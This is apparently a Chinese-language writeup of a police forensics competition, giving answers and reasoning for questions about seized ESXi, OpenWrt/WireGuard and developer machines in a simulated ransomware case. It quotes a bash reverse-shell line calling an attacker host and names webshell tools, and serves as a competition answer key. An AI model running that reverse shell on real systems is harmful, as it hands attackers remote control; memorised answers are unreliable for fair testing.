2022TZ GA比武 第三、四部分 Writeup

背景介绍

​ 某月某日，县公安局接某公司财务部门报警，称其官网及财务报销系统疑被入侵，且攻击者在财务报销系统中投放了勒索病毒，现已无法运行，且服务器内的重要文件均被加密。

​ 县公安局网安大队高度重视，立即根据受害人的反馈对该被入侵服务器进行取证，初步确定了作案手法：这是一次来自互联网的网络攻击，攻击者利用多种漏洞获取到服务器的权限，并投放了勒索病毒对服务器进行加密，以勒索该公司。

案情梳理

官网和财务报销系统被入侵

攻击者在财务报销系统投放了勒索病毒

步骤：

​ 1）来自互联网的网络攻击

​ 2）多种漏洞得到服务器权限

​ 3）投放勒索病毒加密

题目

前提

做题的方法肯定有很多种，每次我都是随性子用方法。也欢迎大家探讨。

检材三、四

​ 在掌握攻击者的远程回连地址后，你们通过回连地址成功抓获了三名犯罪嫌疑人。
​ 经过初步审讯，你们得知三名犯罪嫌疑人分别是王某、李某和丁某。在整个犯罪链条中，王某提供联系方式和密钥，由丁某编写病毒程序，再由李某寻找目标进行渗透并植入病毒，到手后按比例分成。

案件线索：

现对嫌疑人的服务器进行了取证，并分别制作了镜像，请对检材三（ESXI.E01）和检材四（ESXI_NFS.E01）进行分析，并回答以下问题。

（1）注意：对ESXi进行仿真时，请打开Vmware WorkStation中该虚拟机的Intel VT-x/EPT或AMD-V/RVI以打开嵌套虚拟化。

（2）注意：仿真时为保证网络可以访问，请直接修改Vmware Workstation中的NAT网段，而不要尝试修改虚拟机中的IP，以增加仿真成功概率

BUG:这个仿真起来还是有问题的，比如kali第一次没有界面化，第二次仿真就有了。

40、该虚拟化平台的后台登陆URL地址为？（100分）（参考格式：https://xxx.x.x.x/ui/#/login）

https://222.2.2.250/ui/#/login

41、该虚拟化平台的内部版本号为？（100分）

8169922

42、该虚拟化平台网络存储服务器通过NFS进行文件共享，该NFS的配置文件的位置为？（150分）（参考格式：/mnt/data）

/etc/exports

最开始可能不太熟悉NFS存储服务器，所以建议看一下我下边推荐的那篇文章，去了解一下它的流程

参考：

http://www.taodudu.cc/news/show-384291.html?action=onClick

43、该虚拟化平台网络存储服务器在虚拟化平台中的位置为？（200分）（参考格式：/vxx/vxxx/uxxx）

/vmfs/volumes/9af41fd8-941fbcd0

客观的进ESXi里面看看就好了

44、据嫌疑人王某供述，渗透测试机的密码存在于该虚拟机的备注中，该渗透测试机的账号、密码为？（100分）（参考格式：user/pass）

kali/kali

1）

2）

45、攻击者是使用什么软件获取到被入侵网站的Webshell的，请计算该软件的SHA256哈希值？（250分）（格式：大写）

68E38AFE28D9476145D4A1DCBBEA676F6B7FFABCEE076324CB59CDDC5FA5BEC5

最开始我误解了这道题的意思，所以以为答案是蚁剑，所以先做的46题。

也无意间知道了他把用的工具都放在了Download里面。

也发现他在历史命令里，最开始用的命令，除了蚁剑就是ThinkphpGUI，结合ThinkphpGUI的作用，明确ThinkphpGUI就是获取Webshell的工具。

官网：

再结合做检材一时候发现的peiqi.php，明确就是它。

参考：

https://github.com/Lotus6/ThinkphpGUI

46、攻击者是利用什么软件对被入侵网站进行文件浏览、命令执行等操作的，请计算该软件的主程序（可执行文件）的SHA256哈希值？（250分）（格式：大写）

E4870DF2482D9907EFBDDB8FB6A09F8777E335E577263891D902BBBCCE1428F6

熟悉渗透的朋友应该知道，有一个工具叫蚁剑

我原本是在渗透机里面找了一圈，但是我发现没有

再看历史记录的时候，发现他好像删掉了，但是还有。。。。

然后我发现我大概是个傻子

47、该渗透测试机的网关IP是多少？（150分）

192.168.200.1

这里有一个注意的点：brodcast叫做广播地址，不是网关。

48、接上题，该渗透测试机曾接收过反弹shell，请分析该渗透测试机是通过何种方式接收到来自互联网的反弹shell的？（200分）（说明：提交前需联系考官核实）

端口映射

先来看他的反弹shell代码：

bash -i>& /dev/tcp/222.2.2.2/10000 >&1

是在检材一（WEB.E01）中，222.2.2.2是openwrt&wireguard服务器

再去看防火墙的地方：

49、哪一条命令是攻击者用于连接财务服务器？（200分）

rdesktop 106.55.48.5

财务服务器就是检材二（PC.E01）,其IP地址为192.168.100.100

这里我把两个ESXi机器重新仿真了一遍，发现kali可以用界面了，应该是bug。

然后也随便翻了翻，看到桌面的文件：

发现做了端口映射。

PC.E01是Windows服务器，那么登陆的话，一般是使用rdesktop命令，搜了一下历史命令，发现以下：

然后用奇安信的威胁情报搜了一下这个网段，发现是腾讯云，因此只能猜测，这台主机在使用的时候，就是这个IP地址

验证方法：

可以查看历史命令的执行时间，来对应PC.E01被远程连接成功的时间，但是不知道为什么，我的无法查看时间：后续再说吧

export HISTTIMEFORMAT='%F %T'

source ~\.bashrc

history

知识分享：

ssh -CgfNR

-C
要求进行数据压缩 (包括 stdin, stdout, stderr 以及转发 X11 和 TCP/IP 连接 的数据). 压缩算法和 gzip(1) 的一样, 协议第一版中, 压缩级别 ``level 用 CompressionLevel 选项控制. 压缩技术在 modem 线路或其他慢速连接上很有用, 但是在高速网络上反而 可能降低速度. 可以在配置文件中对每个主机单独设定这个参数. 另见 Compression 选项.

-f
要求 在执行命令前退至后台. 它用于当 准备询问口令或密语, 但是用户希望它在后台进行. 该选项隐含了 -n 选项. 在远端机器上启动 X11 程序的推荐手法就是类似于 ssh -f host xterm 的命令.

-g
允许远端主机连接本地转发的端口.

-N
不执行远程命令. 用于转发端口. (仅限协议第二版)

-R port:host:hostport
将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root 登录远程主机 才能转发特权端口. IPv6 地址用另一种格式说明: port/host/hostport

50、该openwrt&wireguard服务器的外网IP的后台管理地址为？（100分）（格式：http://10.10.1.1/test/）

http://222.2.2.2/cgi-bin/luci/

开启虚拟机后，在浏览器访问222.2.2.2会自动跳转到登录界面

51、该openwrt&wireguard服务器的内核版本为？（100分）(格式：3.1.1)

5.4.154

52、该openwrt&wireguard的之前配置过，现已禁用的DDNS域名地址为？（100分）

yourhost.esirplayground.org

53、攻击者和勒索病毒开发者是通过什么协议连入内网的，填协议名称？（200分）

WireGuard VPN

这道题只能是为了做题而做题。大概能从下边这个地方看出来。

53-55三道题，出得很没有里头，全程都没有说内网这个概念，从前面检材一检材二来看，都分别指的是192.168.100.0/24网段和192.168.200.0/24网段。我不知道哪冒出来的，不符合逻辑。

54、接上题，该服务开启在哪个端口号？（100分）（格式：8888）

12345

上题截图，有一个监听端口就是答案。

55、据嫌疑人丁某供述，他为了开发勒索病毒曾连入该内网，请问他连接该内网所使用的公钥为？（150分）

0DydALVvHHU1n+lHpVvaXqayllePKqsPRBbcVcBHLXE=

56、请分析，病毒研发机中的Chrome浏览器未删除的历史记录条数为？（150分）

278

这道题，有异议：

把病毒研发机启动起来，进入（密码是在翻kali文件的时候，偶然翻到的：honglian7001）

直接看是115：

取证分析软件看是278：

57、病毒开发者用于向gitlab提交代码的项目地址为？（150分）

http://192.168.200.201/zhaohong/vir_project.git

通过以下三个地方，可以确定：

58、接上题，病毒开发者访问gitlab的账号密码为？（150分）（格式：user/pass）

root/honglian7001

对照上一题的URL：

59、请分析该病毒研发机，找到启动网站(档案系统)的可执行程序名为？（100分）（格式：1.exe）

服务启动程序.exe

60、接上题，该档案系统的网站后台采用哪种框架技术？（150分）(格式：英文小写)

springboot

没什么技术含量：

61、接上题，该档案系统的Mysql数据库连接用户名、密码为？（200分）（格式：user/pass）

root/123456

找配置文件就对了：

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vtbCncb3-1687657393971)(./image-20230618155144270.png)]

后边的题都是关于JADX逆向的，不会，不做。

62、接上题，该档案系统后台对于账号的密码采用加盐加密，使用加密算法为？（250分）（参考格式大写：RSA）

MD5

63、接上题，在档案系统中找出财务公司被盗取的文件数量为？（250分）（格式：数字）

2

64、接上题，请在档案系统中找到 “zhaohong” 用户所使用的APPID为多少

zhaohong_honglian

65、据王某交代，解密密钥存在其手机的一个APP中，请尝试找出该APP，并给出其包名？（100分）

demo.honglian

66、请分析并提取加密钱包地址，该地址在2022-05-06 12:58:49完成一次交易，交易hash值为多少？（格式：小写）（150分）

honglian

67.该手机涉案QQ账号为？（250）

2678440406

重要提醒:为防止作弊，68题-70题在提交答案前，参赛人员需主动举手向工作6人员展示解题过程后方可提交，否则不得分。工作人员只负责核实解题过程是否真实，不负责答案是否准确。

68、该涉案APK的登陆用户名为？（100分）

69、该APK的登陆密码加密方式为?（150分）（格式：英文小写）

base64

70、该APK的登陆密码明文为？（150分）

123456honglian